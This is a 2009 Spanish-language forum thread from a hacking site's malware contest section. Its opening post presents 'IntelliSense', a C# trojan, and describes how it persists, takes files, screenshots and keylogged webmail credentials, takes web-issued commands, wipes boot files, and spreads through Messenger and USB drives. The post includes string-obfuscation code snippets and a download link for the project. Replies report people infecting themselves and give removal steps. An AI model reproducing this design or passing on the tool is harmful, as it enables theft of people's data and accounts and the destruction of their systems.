elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware
| | |-+  Abril negro (Moderadores: Man-In-the-Middle, WHK, fary)
| | | |-+  IntelliSense control via web - robo de información
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: IntelliSense control via web - robo de información  (Leído 6,087 veces)
43H4FH44H45H4CH49H56H45H
Wiki

Desconectado Desconectado

Mensajes: 503



Ver Perfil
IntelliSense control via web - robo de información
« en: 18 Mayo 2009, 02:30 »

Autor: 43H4FH44H45H4CH49H56H45H
Nombre de la Herramienta:  IntelliSense
Lenguaje: C#.NET
Descripcion:
IntelliSense es una técnica que se me ocurrió para sacar información  y obtener control remoto de una PC o Red enviando ordenes vía web desde cualquier equipo público o privado y cualquier Sistema Operativo con un navegador o cliente FTP.
IntelliSense puede ser aplicado al lenguaje de programación que más nos guste.
Como funciona?
Al iniciar el programa verificara si se encuentra en una cuenta de  Administrador u otro tipo, dependiendo de la cuenta elegirá donde se copiara y si modificara el registro para el auto inicio, deshabilitado del Safe Mode y otras cosas.
Una vez realizada la autocopia listara los archivos que se encuentren en Mis Documentos y el Escritorio para enviarlos vía mail (escogí Gmail para la demostración) a nuestra cuenta además de algunos datos de la víctima. Luego empezara a leer las ordenes web que se encuentren en un archivo "1.txt" que tengamos alojado en alguna pagina web con el siguiente formato:
"PC:ORDEN"
Donde "PC" puede corresponder a la IP pública, IP privada, Nombre de Usuario o Nombre de Usuario de Dominio  para poder enviar la orden a una máquina especifica y si necesitáramos enviarla a todos los PC's se puede usar ALL.
"ORDEN" se refiere a la orden que enviamos a la PC el diseño actual cuenta con
4 ordenes:
CAPTURA: que envía vía mail una captura de pantalla.
KILL: que reemplaza los archivos principales de arranque para evitar el inicio de Windows y reinicia el equipo.
KEYLOG: que envía los datos sustraídos (si los hubiera) de cuentas de correo (páginas en español) como GMAIL, Windows Live Messenger, Hotmail ,Yahoo u otras que especifiquemos.
default: que envía por FTP uno, varios o todos los archivos que queramos utilizando Winrar para comprimirlos, si por ejemplo pusiéramos en la orden:
"*.*" enviara todos los archivos listados
"*.JPG" enviara solo los archivos con dicha extensión.
"documentos.doc" enviara dicho archivo.

Tb cuenta con métodos de protección matando el proceso del Task Manager y si se ingresa a la carpeta donde se encuentre activara la protección igual que con "KILL".
El keylogger solo se activa cuando se ingresa a las páginas que especifiquemos  y cada media hora si hay datos que enviar lo hará vía mail.
En la propagación por Messenger lista todos los contactos que se encuentren en la cuenta actual e ira enviando un link de descarga y una copia de si mismo comprimida a cada contacto, si el contacto esta "conectado" recibirá el link de descarga mas la copia comprimida, en otra caso recibirá solo el link de descarga.
En la replicación por USB listara las carpetas de la unidad USB y las ocultara para luego crear copias de sí mismo con los nombres de dichas carpetas (ya se ha visto en replicación USB).
Además cuenta con la posibilidad de complicar un poco la lectura de los string's utilizados mediante conversión de cada carácter en su valor decimal, para automatizar esto se puede usar un pequeño programa que tenga 3  textBox y un button con el siguiente código:

Código
  1. textBox2.Text = "";
  2. foreach (char a in textBox1.Text)
  3. {
  4. textBox2.Text +=  Convert.ToInt32(a) + " ";
  5. }
  6. textBox3.Text = @"int[] variable = {" + textBox2.Text.Trim ().Replace(" ", ",") + "};";



Código
  1. string cadena = "";
  2.  
  3. foreach (int i in variable)
  4. {
  5.  cadena  += encod(i);
  6. }
  7.  
  8.  
  9. private string encod(int num)
  10. {
  11. string codif = char.ConvertFromUtf32(num);
  12. return codif;
  13. }

Un ejemplo de su aplicación está  en "private void regist()". Además la modificación al registro permite que la autocopia al sistema tenga cualquier extensión, es decir si se copiara como *.txt igualmente se ejecutaría.

Todavía falta agregar y corregir algunos detalles como detección y captura de cámaras disponibles y algunas cosas más.
Link de descarga del proyecto:


http://www.4shared.com/file/106746397/2040d87e/IntelliSense.html

...




« Última modificación: 21 Mayo 2009, 05:11 por 43H4FH44H45H4CH49H56H45H » En línea


-R IP
:0100
-A 100 
2826:0100 MOV AH,09
2826:0102 MOV DX,109
2826:0105 INT 21
2826:0105 MOV AH,08
2826:0105 INT 21
2826:0107 INT 20
2826:0109 DB 'MI NICK ES CODELIVE.$' 
2826:0127 
-R BX
:0000
-R CX
:20
-N CODELIVE.COM
-W
zoneh

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: IntelliSense control via web - robo de información
« Respuesta #1 en: 24 Mayo 2009, 23:26 »

Hola 43H4FH44H45H4CH49H56H45H he bajado el programa y parece que ya me infecte xq me elimino la opcion del administrador de tareas y tambien elimino el comando ejecutar de la barra de inicio, como podria desinfectarme, podrias decirme?


En línea

bomba1990


Desconectado Desconectado

Mensajes: 395



Ver Perfil WWW
Re: IntelliSense control via web - robo de información
« Respuesta #2 en: 25 Mayo 2009, 00:43 »

hola hermano a mi me paso lo mismo. jajaj estamos iguales pero tienes dos formas una restaura el sistema. o puedes entrar a cmd en c\windows\system32\cmd y utilisas taskkill para matar los procesos del virus y despues con el comando reg eliminas currnt user y local machine \microsoft\windows\currnt vrsion\policies\  eliminas la clave que dise algo asi como disable taskkmanagr y otra que dice run. y ya esta. reinicias el sistema. si te da ladilla editar el registro buscat un programa por ahi de esos que acomodan el registro solo en sangoogle encontraras. disculpa por lo mal escrito pero el teclado esta malo.
En línea

"Cuando le di de comer a los pobres me llamaron santo, pero cuando pregunte porque los pobres eran pobres me dijeron comunista"

http://sosinformatico.blogspot.com/
http://www.publisnet.com.ve
track1

Desconectado Desconectado

Mensajes: 102


Ver Perfil
Re: IntelliSense control via web - robo de información
« Respuesta #3 en: 13 Julio 2009, 11:29 »

XDDDD porque no han borrado este post????
En línea

NO HAY CAMINO HACIA LA PAZ,
LA PAZ ES EL CAMINO
JAntrax666

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: IntelliSense control via web - robo de información
« Respuesta #4 en: 14 Julio 2009, 18:39 »

jajajaj
Hola 43H4FH44H45H4CH49H56H45H he bajado el programa y parece que ya me infecte xq me elimino la opcion del administrador de tareas y tambien elimino el comando ejecutar de la barra de inicio, como podria desinfectarme, podrias decirme?


Jamas Respondio x)  :D
En línea

n3fisto

Desconectado Desconectado

Mensajes: 153


Ver Perfil
Re: IntelliSense control via web - robo de información
« Respuesta #5 en: 14 Julio 2009, 18:52 »

Mmmmm uso a unos cuantos para caer y la respuesta del millon por que no respondio¿?¿?¿?¿
En línea

Jaixon Jax


Desconectado Desconectado

Mensajes: 860



Ver Perfil
Re: IntelliSense control via web - robo de información
« Respuesta #6 en: 16 Julio 2009, 05:03 »

  ;-) ;-) ;-) ;-) ;-) ;-)

  Jeje Tremenda aplicacion y nada mas publico esto del codigo:

 
Código:
textBox2.Text = "";foreach (char a in textBox1.Text){ textBox2.Text +=  Convert.ToInt32(a) + " ";}textBox3.Text = @"int[] variable = {" + textBox2.Text.Trim ().Replace(" ", ",") + "};";




Código
string cadena = ""; foreach (int i in variable){  cadena  += encod(i);}  private string encod(int num){string codif = char.ConvertFromUtf32(num);return codif;}

Para mi que este se levanto hoy con ganas de joderce a unos cuantos y lo logro, yo no se por que rayos descargan aplicaciones sin siquiera ver su codigo fuente :¬¬ :¬¬ :¬¬ . Lo que se acostumbra aqui es publicar puro codigo y si el que postea es de confianza puede darse el lujo de publicar exes.. ;) ;) ;)

 


En línea

bomba1990


Desconectado Desconectado

Mensajes: 395



Ver Perfil WWW
Re: IntelliSense control via web - robo de información
« Respuesta #7 en: 16 Julio 2009, 05:44 »

hola hermano jaixon jax, te agradeceria que averiguaras un poquito mejor antes de sacar conjeturas sobre los post. este post lo hicieron para el concurso de abril negro y claro que dentro del archivo viene el codigo fuente y totdo lo demas pero habeces la gente inexperta(me incluyo) se confunda y le da click donde no es y se infecta pero no por eso podemos decir que esto lo hicieron par ajoder a la gnete que lo descague.

OJO: esto es solo para aclarar, no para mas nada.
En línea

"Cuando le di de comer a los pobres me llamaron santo, pero cuando pregunte porque los pobres eran pobres me dijeron comunista"

http://sosinformatico.blogspot.com/
http://www.publisnet.com.ve
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines